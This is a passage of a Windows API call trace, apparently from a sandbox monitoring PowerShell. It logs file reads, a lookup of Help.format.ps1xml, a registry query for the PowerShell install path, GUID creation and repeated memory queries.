	[0294.804] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.805] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.805] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.805] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.805] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.806] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.806] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.806] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.806] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.807] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.807] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.809] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0294.809] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.430] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.430] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.431] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.431] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.431] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.431] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.431] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.432] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.432] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.432] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.432] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.433] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.433] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.433] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.433] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.433] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.434] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.434] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.434] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.434] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.435] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.435] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.435] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.435] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.435] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.436] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.436] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.436] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x1000, lpOverlapped=0x0) returned 1
	[0295.436] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0xf37, lpOverlapped=0x0) returned 1
	[0295.437] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7d18f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7d18f*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0295.437] ReadFile (in: hFile=0x32c, lpBuffer=0x2e7daf0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad098, lpOverlapped=0x0 | out: lpBuffer=0x2e7daf0*, lpNumberOfBytesRead=0x1ad098*=0x0, lpOverlapped=0x0) returned 1
	[0295.437] SetErrorMode (uMode=0x1) returned 0x1
	[0295.437] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad040 | out: lpFileInformation=0x1ad040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0295.437] SetErrorMode (uMode=0x1) returned 0x1
	[0295.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0295.438] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad128 | out: phkResult=0x1ad128*=0x32c) returned 0x0
	[0295.438] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0ac, lpData=0x0, lpcbData=0x1ad0a8*=0x0 | out: lpType=0x1ad0ac*=0x1, lpData=0x0, lpcbData=0x1ad0a8*=0x56) returned 0x0
	[0295.438] CoTaskMemAlloc (cb=0x5a) returned 0x1b6ea6d0
	[0295.438] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad07c, lpData=0x1b6ea6d0, lpcbData=0x1ad078*=0x56 | out: lpType=0x1ad07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad078*=0x56) returned 0x0
	[0295.438] CoTaskMemFree (pv=0x1b6ea6d0) 
	[0295.438] RegCloseKey (hKey=0x32c) returned 0x0
	[0295.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0295.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0295.448] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0x3a4ce936, Data2=0x6979, Data3=0x4bf9, Data4=([0]=0x9c, [1]=0xd0, [2]=0xef, [3]=0x96, [4]=0x42, [5]=0x8b, [6]=0x27, [7]=0x5e))) returned 0x0
	[0295.448] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xd3d535ee, Data2=0x6a9, Data3=0x45bf, Data4=([0]=0x90, [1]=0x99, [2]=0x6, [3]=0x9e, [4]=0xec, [5]=0x2b, [6]=0xc5, [7]=0xfc))) returned 0x0
	[0295.457] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xffddd100, Data2=0xcb4, Data3=0x4838, Data4=([0]=0x87, [1]=0xe3, [2]=0x33, [3]=0x66, [4]=0x1d, [5]=0x11, [6]=0x8d, [7]=0xf5))) returned 0x0
	[0295.458] VirtualQuery (in: lpAddress=0x1ab360, lpBuffer=0x1ac220, dwLength=0x30 | out: lpBuffer=0x1ac220*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1ab3f0, lpBuffer=0x1ac2b0, dwLength=0x30 | out: lpBuffer=0x1ac2b0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.458] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.459] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1ab7a0, lpBuffer=0x1ac660, dwLength=0x30 | out: lpBuffer=0x1ac660*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.460] CoCreateGuid (in: pguid=0x1ad350 | out: pguid=0x1ad350*(Data1=0xb1950716, Data2=0x3268, Data3=0x4c48, Data4=([0]=0xa3, [1]=0x46, [2]=0x5f, [3]=0x5c, [4]=0xa3, [5]=0x73, [6]=0xb4, [7]=0x80))) returned 0x0
	[0295.461] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.461] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.461] VirtualQuery (in: lpAddress=0x1abb70, lpBuffer=0x1aca30, dwLength=0x30 | out: lpBuffer=0x1aca30*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.461] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.462] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abad0, lpBuffer=0x1ac990, dwLength=0x30 | out: lpBuffer=0x1ac990*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.463] VirtualQuery (in: lpAddress=0x1abb60, lpBuffer=0x1aca20, dwLength=0x30 | out: lpBuffer=0x1aca20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
